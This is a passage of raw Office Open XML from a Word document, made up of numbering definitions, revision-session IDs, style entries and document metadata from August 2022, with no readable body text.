          <w:p w14:paraId="059C361D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C361F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C3620" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:sectPr w:rsidR="002D44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9FC4D1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="809FC4D1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80B85C8E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="80B85C8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81B4CFD8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="81B4CFD8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83A27A36"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="83A27A36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85437792"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8543779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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="89EB95F7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="89EB95F7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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="8B15C4F1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8B15C4F1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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="8C175A17"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8C175A17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" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="932D6409"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="932D6409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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="94A0DCCF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="94A0DCC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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="962EB033"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="962EB033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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="98412BE2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="98412BE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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="9B5F39A8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9B5F39A8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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="A04A4D73"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A04A4D73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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="B167BBDD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B167BBDD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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="B281DC37"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B281DC37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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="B6F9CF67"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B6F9CF67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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="BEAFCDE8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BEAFCDE8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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="C2B88D88"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C2B88D88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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="C498EBE7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C498EBE7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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="C5946D62"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C5946D6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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="CFA27EBF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CFA27EB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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="D06E56DB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D06E56D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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="D1A3674B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D1A3674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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="DDE554DF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DDE554D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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="DE65A30D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DE65A30D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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="E2AA8E63"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E2AA8E63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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="E80AD159"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E80AD159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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="ECD6518C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="ECD6518C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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="EF5DD1B3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="EF5DD1B3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30" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="F0342C39"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F0342C39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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FD0892C7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FD0892C7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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="018AAD1B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="018AAD1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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="050E369A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="050E369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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="05DEAD2C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="05DEAD2C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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0AF144A3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0AF144A3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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1339B133"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1339B133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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="14072ED4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="14072ED4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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="178CC402"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="178CC40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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1ED36181"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1ED36181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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1FEA64C3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1FEA64C3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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2657450D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2657450D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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2984CEF7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2984CEF7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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="390D4EF0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="390D4EF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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="39F0F0D0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="39F0F0D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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3B7C5B80"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3B7C5B8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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="502B9319"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="502B9319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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="562EF7CC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="562EF7CC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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="58F78FFA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="58F78FF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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5ADBB036"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5ADBB036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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="61873167"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="61873167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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6495BB28"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6495BB28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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6837C36D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6837C36D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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="69288094"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="69288094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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6B59828F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6B59828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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6EE51694"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE761C5C"/>
    <w:lvl w:ilvl="0" w:tplc="5A8AB6A6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8500A12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1D8ED78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D89968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6E7854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AD69828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6422798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E1864BA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246DFD4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2CC9559"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="72CC9559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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="758FC548"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="758FC548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 w16cid:durableId="308246986">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="766272310">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1604730679">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2146729201">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="462580876">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1867592775">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1126967835">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="234585590">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="696397259">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2144957414">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1652366578">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1945648501">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1498615747">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1351761992">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1646665157">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1708529244">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1302465423">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1471438169">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="262149747">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1250115163">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="2098285471">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1876116818">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1668482563">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="56176093">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="93014992">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1346665154">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="531304226">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1928921964">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="2123765936">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="145826748">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1496531848">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="563832409">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1425028812">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="234438385">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="2082827522">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="983434384">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="114252296">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="898132195">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="820459652">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1238513505">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="366032663">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="169879262">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="241644319">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1047068864">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="1091665143">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1494955434">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="947389916">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="1014497651">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="428695776">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="1476794464">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1158768073">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="2051568783">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="1756633386">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="57829033">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="598412062">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="565067200">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="1460345002">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="849878245">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:numIdMacAtCleanup w:val="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WJmNmFhZDBmNmMyZDY0OGQ4MDRhNGI5YzIyZmU1ZDkifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="0630171D"/>
    <w:rsid w:val="002D44C5"/>
    <w:rsid w:val="006029F6"/>
    <w:rsid w:val="006201D1"/>
    <w:rsid w:val="006261D8"/>
    <w:rsid w:val="00716AFC"/>
    <w:rsid w:val="008A3C16"/>
    <w:rsid w:val="00AA3FA2"/>
    <w:rsid w:val="00B14F0E"/>
    <w:rsid w:val="00C3721D"/>
    <w:rsid w:val="00DE360D"/>
    <w:rsid w:val="00E0266D"/>
    <w:rsid w:val="01D17056"/>
    <w:rsid w:val="01D34903"/>
    <w:rsid w:val="01DD3040"/>
    <w:rsid w:val="02D969CA"/>
    <w:rsid w:val="02FB627A"/>
    <w:rsid w:val="030A0E63"/>
    <w:rsid w:val="041B0E47"/>
    <w:rsid w:val="04BC6DA5"/>
    <w:rsid w:val="05A131E3"/>
    <w:rsid w:val="0630171D"/>
    <w:rsid w:val="063A1D69"/>
    <w:rsid w:val="06965E6A"/>
    <w:rsid w:val="071B0A66"/>
    <w:rsid w:val="0CB14B3E"/>
    <w:rsid w:val="0CE707EA"/>
    <w:rsid w:val="0CFD02DF"/>
    <w:rsid w:val="0D17176D"/>
    <w:rsid w:val="0DBE0D6E"/>
    <w:rsid w:val="0DF201AC"/>
    <w:rsid w:val="0EAE5F4F"/>
    <w:rsid w:val="100A3E2E"/>
    <w:rsid w:val="10B10F0F"/>
    <w:rsid w:val="10D64A3D"/>
    <w:rsid w:val="12A37312"/>
    <w:rsid w:val="132F7448"/>
    <w:rsid w:val="13F106B7"/>
    <w:rsid w:val="15502AF8"/>
    <w:rsid w:val="15ED5222"/>
    <w:rsid w:val="16831F71"/>
    <w:rsid w:val="181A30AD"/>
    <w:rsid w:val="184364A5"/>
    <w:rsid w:val="1853036D"/>
    <w:rsid w:val="18DA4633"/>
    <w:rsid w:val="1A7B1DFD"/>
    <w:rsid w:val="1B3F7EB6"/>
    <w:rsid w:val="1B7808C1"/>
    <w:rsid w:val="1BB96F7A"/>
    <w:rsid w:val="1C57174D"/>
    <w:rsid w:val="1D8A6D7F"/>
    <w:rsid w:val="1DC069C9"/>
    <w:rsid w:val="1F5C4E0B"/>
    <w:rsid w:val="21BA3905"/>
    <w:rsid w:val="230D6D75"/>
    <w:rsid w:val="23655AD8"/>
    <w:rsid w:val="24126880"/>
    <w:rsid w:val="247F5768"/>
    <w:rsid w:val="25D677D1"/>
    <w:rsid w:val="26A0441A"/>
    <w:rsid w:val="27152837"/>
    <w:rsid w:val="27FB3BEE"/>
    <w:rsid w:val="2B4D0F88"/>
    <w:rsid w:val="2BA17DF7"/>
    <w:rsid w:val="2EBF0D83"/>
    <w:rsid w:val="2ED32B61"/>
    <w:rsid w:val="3066691A"/>
    <w:rsid w:val="314B5615"/>
    <w:rsid w:val="31E83292"/>
    <w:rsid w:val="31FB7654"/>
    <w:rsid w:val="32DF1FA1"/>
    <w:rsid w:val="34711BC9"/>
    <w:rsid w:val="355E01A8"/>
    <w:rsid w:val="377A6FF2"/>
    <w:rsid w:val="37C73CDC"/>
    <w:rsid w:val="39783C80"/>
    <w:rsid w:val="3A226537"/>
    <w:rsid w:val="3A6D4088"/>
    <w:rsid w:val="3A8D2FCA"/>
    <w:rsid w:val="3AD25E58"/>
    <w:rsid w:val="3B7F57C2"/>
    <w:rsid w:val="3B8C7B5B"/>
    <w:rsid w:val="3BA81389"/>
    <w:rsid w:val="3DEC2E39"/>
    <w:rsid w:val="3E8D598A"/>
    <w:rsid w:val="3E960C11"/>
    <w:rsid w:val="3ECA07E7"/>
    <w:rsid w:val="3F9F31CE"/>
    <w:rsid w:val="3FA70FAC"/>
    <w:rsid w:val="43BD5ED0"/>
    <w:rsid w:val="44562E10"/>
    <w:rsid w:val="453B1931"/>
    <w:rsid w:val="46175AEB"/>
    <w:rsid w:val="468159CD"/>
    <w:rsid w:val="47122C62"/>
    <w:rsid w:val="47F6698D"/>
    <w:rsid w:val="49584F34"/>
    <w:rsid w:val="4A0138A0"/>
    <w:rsid w:val="4A6F1D9A"/>
    <w:rsid w:val="4C9E28D1"/>
    <w:rsid w:val="4CC26168"/>
    <w:rsid w:val="4CE216E4"/>
    <w:rsid w:val="4D0D0088"/>
    <w:rsid w:val="4D5725AA"/>
    <w:rsid w:val="4FA352B6"/>
    <w:rsid w:val="50EA1A42"/>
    <w:rsid w:val="516E2FA4"/>
    <w:rsid w:val="52BD4BE6"/>
    <w:rsid w:val="550D3076"/>
    <w:rsid w:val="553C2057"/>
    <w:rsid w:val="55D6017C"/>
    <w:rsid w:val="56280252"/>
    <w:rsid w:val="562809AC"/>
    <w:rsid w:val="574D133D"/>
    <w:rsid w:val="57DD1426"/>
    <w:rsid w:val="57DF1A8E"/>
    <w:rsid w:val="58214A53"/>
    <w:rsid w:val="58A551DE"/>
    <w:rsid w:val="59B80E95"/>
    <w:rsid w:val="5AE57D65"/>
    <w:rsid w:val="5B1926BF"/>
    <w:rsid w:val="5CF66D96"/>
    <w:rsid w:val="5D7021B5"/>
    <w:rsid w:val="5EB47E33"/>
    <w:rsid w:val="5F831984"/>
    <w:rsid w:val="609B3C2C"/>
    <w:rsid w:val="60C22582"/>
    <w:rsid w:val="614175BF"/>
    <w:rsid w:val="61DB4B20"/>
    <w:rsid w:val="61E11616"/>
    <w:rsid w:val="621A63B0"/>
    <w:rsid w:val="648D11D2"/>
    <w:rsid w:val="65147887"/>
    <w:rsid w:val="68925993"/>
    <w:rsid w:val="6A213F62"/>
    <w:rsid w:val="6B510552"/>
    <w:rsid w:val="6BAB15CC"/>
    <w:rsid w:val="6C5630FD"/>
    <w:rsid w:val="6C794209"/>
    <w:rsid w:val="6C8D6673"/>
    <w:rsid w:val="6D367D2B"/>
    <w:rsid w:val="6DA225DD"/>
    <w:rsid w:val="6FFD01FF"/>
    <w:rsid w:val="709E2368"/>
    <w:rsid w:val="712109F1"/>
    <w:rsid w:val="717E737E"/>
    <w:rsid w:val="718A5D23"/>
    <w:rsid w:val="71C60CAD"/>
    <w:rsid w:val="72C30BC0"/>
    <w:rsid w:val="73375A36"/>
    <w:rsid w:val="73FF5DF1"/>
    <w:rsid w:val="746638E3"/>
    <w:rsid w:val="7522290F"/>
    <w:rsid w:val="77526C76"/>
    <w:rsid w:val="77B02B0D"/>
    <w:rsid w:val="78825E9D"/>
    <w:rsid w:val="78A663CC"/>
    <w:rsid w:val="79351931"/>
    <w:rsid w:val="7987219A"/>
    <w:rsid w:val="7A764D3F"/>
    <w:rsid w:val="7A8A1561"/>
    <w:rsid w:val="7AB43463"/>
    <w:rsid w:val="7BD26DC5"/>
    <w:rsid w:val="7C6848CB"/>
    <w:rsid w:val="7D6665F3"/>
    <w:rsid w:val="7D767CDA"/>
    <w:rsid w:val="7EE235AB"/>
    <w:rsid w:val="7EE77336"/>
    <w:rsid w:val="7EFC64EB"/>
    <w:rsid w:val="7FD16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9C3315"/>
  <w15:docId w15:val="{01E80166-C147-4034-AA2D-38A50F9F3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basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:leftChars="200" w:left="420"/>
    </w:pPr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qFormat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8A3C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6">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00716AFC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10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75482">
          <w:marLeft w:val="7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21</Pages>
  <Words>1175</Words>
  <Characters>6699</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>55</Lines>
  <Paragraphs>15</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>7859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</dc:creator>
  <cp:lastModifiedBy>kuli zhong</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-07T12:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-18T07:49:00Z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D6EA1128BC224A14BF7ABDDEBEDFF0E3</vt:lpwstr>
  </property>
</Properties>
</file>